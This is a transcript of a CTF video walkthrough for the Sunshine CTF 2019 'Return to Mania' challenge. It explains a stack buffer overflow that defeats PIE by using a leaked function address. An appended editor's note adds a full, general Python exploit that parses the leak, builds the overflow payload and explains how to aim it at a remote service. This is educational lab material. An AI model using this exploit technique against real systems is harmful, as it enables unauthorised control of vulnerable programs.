What's going on, everybody? My name is John Hammond and we're looking again at Sunshine CTF 2019, the game hosted by BSides Orlando, put together by the Hack@UCF guys. So, great game. Checking out the Pwn category. I do not normally venture into these dark, dark wells because I'm a noob and not that good, but I did manage to get Return to Mania done and over with. So, 50 points. The challenge prompt is: to celebrate her new return to wrestling, Captain Overflow authored this challenge to enter the ring. Okay, so we have a binary to download and a netcat session that we can connect to.

So let's just put together a little connect.sh script, because I like to do that, just encapsulate stuff so I don't have to remember the actual IP address and port. We can connect to it, good, and let's go ahead and download the binary, because I would rather work with that. Let's copy that link location, let's wget it here, and let's check out what we've got. Okay, it doesn't want me to do that. I'll just go ahead and save it. Okay, now I have the file downloaded. We have Return to Mania right here. It is an ELF 32-bit LSB shared object, blah, blah, blah, not stripped. Cool.

Okay, so let's go ahead and execute it. Mark it executable, anyway, and let's go ahead and run it. Return to Mania. "Welcome to WrestleMania. Type in key to get access. Address of welcome is" that. Type in key. Okay, "key". "Sadly, as a result of Captain Overflow, won't be entering the ring yet." Okay, so I'll do basic file reconnaissance before we get into regular reverse engineering and stuff like that: strings on it, etc., etc. Oh, flag.txt. "Welcome to the ring," etc. Okay, will ltrace work on that? Return to Mania. Hello. Nope. What about strace? Anything worthwhile? Reads and inputs? Hello? Right? "Welcome to WrestleMania." No. Okay, whatever. Let's fire up Ghidra then. So I've got Ghidra in my opt directory, in the ghidra folder, and let's go ahead and ghidraRun. Okay, I've got Ghidra open now. Let's create just a dummy project.
New, in... yeah, anything, I guess. I don't really care where it goes; I just want Ghidra to work. So let's fire up the dragon here. Cool. And it's I to import, and we want Return to Mania in Sun ZDF. Okay, great, go ahead and import it. Yes. It's probably going to want to analyze it, so let's analyze everything. Good. And I don't know if I can make this font much bigger. I know I can, actually; we've done it before in the stream: Tool Options, Decompiler, Display. Okay, font size, let's go like 16. Maybe that's better. And Listing Display, monospace, let's go 16. Okay, apply on those. Cool. Okay, might be a little bit easier to read now, fingers crossed.

Okay, yeah, so let's just go ahead and search for main. Let's get the main function up here. And it looks like, in the decompilation, what this does is it runs welcome, and then "Sadly, as a result of Captain Overflow, won't be entering the ring yet." Okay, so what does welcome do? Let's click on him. "Welcome to WrestleMania, type in the key to get access." Okay, printf "Address of welcome," welcome. And then it runs scanf, so it tries to read in something, and this must be a buffer, 14 bytes. Okay, let's rename that; let's just call it our input. And scanf. So we want to be able to get to mania. What is mania? Is mania a function? I know I saw it in here. Yeah, mania is a function. "Welcome to the ring." And then it has a flag handle, and then it gets... okay, so it will read the flag. Yeah, so if we rename these just so it makes sense, we have flag buffer as a buffer of 40 characters, and then the stream that we're opening up, and it'll display it out. So it will read the flag and put it on the screen for us. Okay, so that makes sense. We have to be able to call mania. So scanf, I'm assuming, is going to be an overflow, a buffer overflow. It gives us the address of welcome, though, and that was weird to me. I don't know why. So let's go ahead and check this out with checksec.
So checksec, part of pwntools. Let's run it on Return to Mania. It looks like PIE, position independent executable, position independent code, is enabled, which is probably why they're giving us the address of welcome, because that is going to differ every single time we run it, right? Yes, address of welcome changes, changes, changes. So position independent code and position independent executable: it's going to have a change where the actual program functions are when you're running the program, the same way ASLR will kind of randomize the stack. ASLR, address space layout randomization, and that will make it a struggle for you to find positions of things in memory. This PIE, position independent code and executable, from what I understand, will help randomize the locations of the functions that are being called and run within the program. So if I were to readelf -s on Return to Mania, what I'm going to be seeing for the value is not where that function is anymore in memory; it's actually going to be an offset as to where it would be. So we can check out, okay, the main function is here, and the welcome function is here, relative to some random starting position. Same thing with mania; that's relative to some random starting position. So we can figure this out, right?

If we wanted to be able to call mania, do we actually have a buffer overflow? Let's try and use pwn cyclic. And I know the buffer was like 14, so let's go to like 40. Yep. And let's go ahead and, sorry, paste that. Echo that into our Return to Mania program. We get a segfault; dmesg, check out where it is. Let's dmesg, tail that, and blah, blah, blah, "return_to_mania segfault at" this. So when you're using pwn cyclic, you can say pwn cyclic and the length to generate that cyclic pattern. Then you can say pwn cyclic -l to look up, and then you want to have this in 32 bits, so you want to have four hex values here,
and then 0x to specify that that is hex. pwn cyclic will find it at 22. So now that tells us that the offset to where we're going to be able to control EIP, and actually control our buffer overflow, is 22 characters in. So we'll use python -c to print out 22 A's, right? And we would go ahead and pump that to our Return to Mania program. We get a segmentation fault; check out dmesg. And that returns a trap here, because it doesn't know where to particularly go next. But if we were to give it some values after that, like let's say BBBB, we go ahead and get our overflow, and it's trying to jump to, segfault at 0x42424242, or all of our B's. So we can control now the return address as to where it's going to go.

Problem is position independent code, position independent executable. We don't know where mania is going to be, or even welcome, or anything, except the program tells us the address of welcome. So if that is at a random position, and I'll just start to put together our scripts, but I want to have this make sense to you here: if address of welcome is equal to random start plus, it was 0x and then what was all that stuff? Let's readelf -s again on Return to Mania. Welcome was over at this address, and mania was over at this address, all with an offset, right? Address of mania is now going to equal random start plus that. Good. We've got some information, because we also know the address of welcome is given to us when we run the program. So if we were to run Return to Mania, address of welcome is at this position, we can say address of welcome equals that. But we should know that that varies dependent on what the program gives us, right? So let's just say, what program gives, how about program_gives? Good. So now we can solve this kind of like a system of equations, right? Random start is common in both of these. So let's go ahead and set these in terms of random start. If we had random start, it will equal address of welcome minus that.
So now random start equals that. We'll do the same thing down here. Using some algebra, let's go ahead and subtract these, and then say random start is equal to that. Now we can say, oh, random start is equal to this and equal to this. So let's put these together. Address of welcome is equal to address of mania, just like that. Does that make sense? So now, because we know address of welcome, we can substitute that in; address of welcome is going to be that. So now we can solve this for address of mania. Let's go ahead and say address of mania should equal all that. So I think my numbers are off here, though. Oh, right, because when I'm putting address of mania in there, I'm adding this. Okay, so now we can say address of mania is going to be what the program gives minus this information, and we'll just use IDLE to crank that out. Oh, sorry, negative, negative that, minus 144. Okay. So program gives minus 144; that's our address of mania. All we really did when we did that was try to find the difference between these offsets, right? So 0x...5d minus 0x...ed is negative 144. I just kind of wanted to showcase how that all works, maybe in a mathematical way that's thorough in your understanding. But given this information, you can figure this out; we just have to get address of welcome carved out of that.

So let's go and work with this. Now we have a .py, so let's create a script. Let's say #!/usr/bin/env python, get our shebang line in there. I'm going to use the pwntools library, from pwn import *. And let's say our elf can equal an ELF file of Return to Mania, and let's say the process p can equal elf.process. So we want to see what we've got here so far. Let's print p.recv. I think that'll give us the information that we need, right? Let's python it. "Welcome to WrestleMania." And it looks like it's hanging. So maybe too many extra receives here. What we can do is we can split this up. Let's split this up by a newline, and let's get the last line.
And then let's split it by 0x. Maybe. Yeah, I think that's fair. I'll go ahead and kill the hex part for us too, because we need to get rid of that. So now what have we got? We got the address. Cool. Why does it have a space in there? Oh, it's not getting it at all. I'm stupid, sorry. So let's see what we got. It has an extra newline, does it? Yeah, address of welcome is now in there. So now we can split on 0x, this is what we've done before, and let's get our negative one, so we get that hex portion. Great. Okay, so address of welcome equals that, and that's an int, base 16. So now we have the address of welcome. So that means the address of mania is just that address of welcome minus 144, right?

So let's go ahead and create an actual... p32 will do that for us, and with pwntools that p32 function will take an integer and then convert it into that little-endian format that we need. So let's say our payload is going to equal 22 A's, right, because that was the offset that we found with our pwn cyclic, and then we need the actual function that we want to jump to. So payload can plus-equal, we want to give it p32, 32-bit, and the actual address of mania that we're working with. So now we can say p.sendline payload, and let's go interactive just to see if we got anything working with us. Let's go ahead and run this, and "p has no attribute interactive". Excuse me. Let's just do... oh, because I didn't have an i in interactive. There we go. "Welcome to the ring. flag.txt: No such file or directory." So we've got our exploit working; we've jumped to the mania function. And we can go ahead and redirect this now to whatever our connect function, or connect script, actually tells us to. We can say no longer do I want to work with the binary; I want to go ahead and say p equals a remote connection to this host with that port, and we should be able to just get a real flag. Let's crank through this. There we go. "Welcome to the ring," sun overflow run wild brother.
We did it. So that was a buffer overflow that we were able to take advantage of with position independent executable on, because it was willing to tell us where the welcome function was. We could use that smart return-to-libc mindset, where you find the offset from something to get you to another thing. That's, I think, why this challenge was called Return to Mania: because you're just determining, based off of a random starting position, you can still determine with the offsets what the other thing is. So that's that. There is our flag. Let's go ahead and submit that and you get that 50 points. Good stuff. Thank you guys for watching. Hope you enjoyed this. If you did like this video, please do like, comment and subscribe. Love to see you in the Discord server. Love to see you on Patreon. Love to see you on PayPal. Thank you guys so much for watching. I can't say it enough. See you in the next video.
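Editor's note: the leak-to-target arithmetic the video walks through (recover the PIE base from the printed address of welcome, add the target's file offset, pad 22 bytes to the saved return address, append the little-endian address) is written out below as an added, runnable example. It is not the video's script and does not use pwntools, so it runs offline; the full symbol offsets (only the low bytes 0x...ed and 0x...5d, 144 bytes apart, are visible in the video), the banner wording, and the function names are assumptions, and the transport is abstracted to a pair of callables so the same logic works against a pwntools process(), remote(), or a plain socket. It generalizes beyond the specific case: resolve() maps any leaked symbol to any other symbol in the same image, and build_payload() adds the page-alignment and whitespace sanity checks a practitioner would want before sending.

```python
import re
import struct
from typing import Callable, List

# Symbol offsets as `readelf -s` reports them for the PIE binary. The video only
# shows that welcome ends in 0x...ed and mania in 0x...5d, 144 bytes apart; the
# full values below are ASSUMED placeholders that preserve that difference.
WELCOME_OFFSET = 0x6ED
MANIA_OFFSET = 0x65D

# Bytes from the start of scanf's buffer to the saved return address, as found
# in the video with `pwn cyclic 40` and `pwn cyclic -l 0x...`.
PAD_TO_RET = 22

PAGE_MASK = 0xFFF
_ADDR_RE = re.compile(rb"0x([0-9a-fA-F]{1,8})")


def parse_leak(banner: bytes) -> int:
    """Return the last 0x-prefixed address printed in the banner.

    Same idea as the video's split('\\n')[-1].split('0x')[-1] with int(..., 16),
    but tolerant of trailing blank lines and of the leak not being the last line.
    """
    matches = _ADDR_RE.findall(banner)
    if not matches:
        raise ValueError("banner contains no 0x... address to work with")
    return int(matches[-1], 16)


def pie_base(leaked_addr: int, leaked_offset: int) -> int:
    """Recover the random load base from one leaked address and its file offset."""
    base = leaked_addr - leaked_offset
    # The loader maps a PIE on a page boundary, so non-zero low 12 bits mean the
    # leak was mis-parsed or the offset belongs to the wrong symbol.
    if base & PAGE_MASK:
        raise ValueError(f"base {base:#x} is not page aligned; check the leaked symbol offset")
    return base


def resolve(leaked_addr: int, leaked_offset: int, target_offset: int) -> int:
    """Runtime address of any other symbol: base + its offset (mania = welcome - 144 here)."""
    return pie_base(leaked_addr, leaked_offset) + target_offset


def build_payload(ret_addr: int, pad: int = PAD_TO_RET) -> bytes:
    """Pad up to the saved EIP, then overwrite it with a little-endian 32-bit address."""
    if not 0 <= ret_addr <= 0xFFFFFFFF:
        raise ValueError("return address does not fit in 32 bits")
    packed = struct.pack("<I", ret_addr)  # what pwntools' p32() produces
    # Caveat: if scanf is doing a string conversion, a whitespace byte (the C
    # isspace() set, 0x09-0x0d and 0x20) ends the read early and truncates the
    # address. The exact format string is not shown in the video, so check.
    bad = [b for b in packed if b in b"\t\n\x0b\x0c\r "]
    if bad:
        raise ValueError(f"address contains whitespace bytes {bad}; scanf may truncate it")
    return b"A" * pad + packed


def run_exploit(recv: Callable[[], bytes], send: Callable[[bytes], None]) -> int:
    """Read the banner, compute mania's runtime address, send the overflow.

    `recv` and `send` stand in for a socket or a pwntools process()/remote()
    (p.recv / p.sendline); a function interface lets the logic run offline.
    """
    leaked_welcome = parse_leak(recv())
    mania = resolve(leaked_welcome, WELCOME_OFFSET, MANIA_OFFSET)
    send(build_payload(mania))
    return mania


# CONSTRUCTED banner for an offline dry run; the program's real output wording
# is not reproduced verbatim in the video.
SAMPLE_BANNER = (
    b"Welcome to WrestleMania!\n"
    b"Type in key to get access\n"
    b"Address of welcome is 0x565556ed\n"
)


def demo() -> List[bytes]:
    """Drive run_exploit against the constructed banner and return what was sent."""
    sent: List[bytes] = []
    run_exploit(lambda: SAMPLE_BANNER, sent.append)
    return sent


if __name__ == "__main__":
    for chunk in demo():
        print(chunk.hex())
```

To point this at the real service, replace the two lambdas with a pwntools `remote(host, port)` object's `recv` and `sendline` (or a `process()` for the local binary) and call `p.interactive()` afterwards to read the flag; everything else stays the same.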